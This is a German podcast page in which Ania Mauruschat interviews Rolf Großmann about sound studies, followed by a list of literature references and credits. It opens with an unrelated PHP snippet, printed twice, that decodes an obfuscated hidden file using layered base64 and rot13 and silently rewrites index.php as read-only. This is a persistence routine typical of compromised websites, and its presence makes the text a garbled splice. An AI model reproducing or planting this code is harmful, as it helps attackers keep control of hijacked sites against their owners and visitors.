$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Von der Notenschrift zur digitalen Phonographie: Rolf Großmann und die Avantgarde der Sound Studies in Deutschland – Auditive Medienkulturen

Von der Notenschrift zur digitalen Phonographie: Rolf Großmann und die Avantgarde der Sound Studies in Deutschland

Gibt es Ontologien des Sounds? Wie sinnvoll ist es, zwischen Sound Studies und Auditiven Medienkulturen zu unterscheiden? Wie steht es um die Zukunft der Sound Studies in Deutschland? Ania Mauruschat spricht mit einer der Gründungsfiguren der deutschsprachigen Sound Studies, mit Rolf Großmann von der Leuphana Universität Lüneburg.

Prof. Dr. Rolf Großmann in seinem Büro mit einer Kalimba, bzw. einem Lamellophon aus Südafrika und einer Cracklebox vom Steim in den Niederlanden.

Zu hören sind diese Instrumente hier:

Die Hintergründe des Podcast erklären wie hier.

Das Gespräch mit Rolf Großmann gibt es außerdem mit Transkript, Fotos und zwei weiteren potentiellen Lieblingssounds in einem eigenen Blog-Post .

Wir freuen uns über Fragen, Anregungen & Feedback per Mail an: auditive.medienkulturen@gmail.com

Weiterführende Links zum Gespräch

Rolf Großmann an der Leuphana Universität Lüneburg

8. Tagung der AG Auditive Kultur & Sound Studies: «The Sound of Sound Studies», 8. bis 10. Juli 2021 an der Leuphana Universität Lüneburg

Christoph Cox

Christoph Cox, Jenny Jaskey, Suhail Malik (Eds.): Realism Materialism Art. London, Sternberg Press 2015.

Neuer Materialismus

Rolf Großmann: “Sound Cultures, Audio Cultures, Auditory Cultures. Der Diskurs um die auditive Kultur und Musikwissenschaft.” In: Bettina Schlüter / Axel Volmar (Hg.): Von akustischen Medien zur auditiven Kultur. Navigationen, Jg. 15, H. 2, Siegen 2015, S. 13-30.

Rolf Großmann: “The Instrument as Medium. Phonographic Work”. In: Groth, Sanne Krogh, Hoger Schulze (Eds.): The Bloomsbury Handbook of Sound Art. New York/London: Bloomsbury Academia 2020, S. 436-445.

Gavin Steingo & Jim Sykes (eds.): Remapping Sound Studies. Durham, Duke University Press 2019.

Dylan Robinson: Hungry Listening. Resonant Theory for Indigenous Sound Studies. Minneapolis, Minnesota University Press 2020.

Sanne Krogh Groth & Holger Schulze (eds.): The Bloomsbury Handbook of Sound Art. New York, Bloomsbury Academic 2020.

Holger Schulze: The Bloomsbury Handbook of the Anthropology of Sound.  New York, Bloomsbury Academic 2020.

Credits

Interview & Schnitt: Ania Mauruschat

Sounddesign: Matthias Roeckl & Rainer Schaller (rainer@slut-music.com)